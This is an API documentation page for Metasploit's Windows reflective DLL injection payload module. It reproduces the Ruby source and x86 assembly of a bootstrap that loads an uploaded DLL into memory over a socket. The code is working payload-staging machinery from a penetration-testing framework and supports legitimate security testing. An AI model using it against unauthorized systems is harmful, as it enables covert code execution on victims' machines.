Module: Msf::Payload::Windows::ReflectiveDllInject

Includes:
Msf::Payload::Windows, ReflectiveDLLLoader
Defined in:
lib/msf/core/payload/windows/reflectivedllinject.rb

Constant Summary

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#asm_invoke_dll(opts = {}) ⇒ Object


43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# File 'lib/msf/core/payload/windows/reflectivedllinject.rb', line 43

def asm_invoke_dll(opts={})
  asm = %Q^
      ; prologue
        dec ebp               ; 'M'
        pop edx               ; 'Z'
        call $+5              ; call next instruction
        pop ebx               ; get the current location (+7 bytes)
        push edx              ; restore edx
        inc ebp               ; restore ebp
        push ebp              ; save ebp for later
        mov ebp, esp          ; set up a new stack frame
      ; Invoke ReflectiveLoader()
        ; add the offset to ReflectiveLoader() (0x????????)
        add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
        call ebx              ; invoke ReflectiveLoader()
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
        push edi              ; push the socket handle
        push 4                ; indicate that we have attached
        push eax              ; push some arbitrary value for hInstance
        mov ebx, eax          ; save DllMain for another call
        call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
        ; push the exitfunk value onto the stack
        push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
        push 5                ; indicate that we have detached
        push eax              ; push some arbitrary value for hInstance
        call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
  ^
end

#initialize(info = {}) ⇒ Object


21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# File 'lib/msf/core/payload/windows/reflectivedllinject.rb', line 21

def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Reflective DLL Injection',
    'Description'   => 'Inject a DLL via a reflective loader',
    'Author'        => [ 'sf' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X86,
    'PayloadCompat' => { 'Convention' => 'sockedi -https', },
    'Stage'         => { 'Payload'   => "" }
    ))

  register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
end

#library_pathObject


39
40
41
# File 'lib/msf/core/payload/windows/reflectivedllinject.rb', line 39

def library_path
  datastore['DLL']
end

#stage_payload(opts = {}) ⇒ Object


73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# File 'lib/msf/core/payload/windows/reflectivedllinject.rb', line 73

def stage_payload(opts = {})
  # Exceptions will be thrown by the mixin if there are issues.
  dll, offset = load_rdi_dll(library_path)

  asm_opts = {
    rdi_offset: offset,
    exitfunk:   'thread'  # default to 'thread' for migration
  }

  asm = asm_invoke_dll(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string

  # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
  if bootstrap.length > 62
    raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[ 0, bootstrap.length ] = bootstrap

  dll
end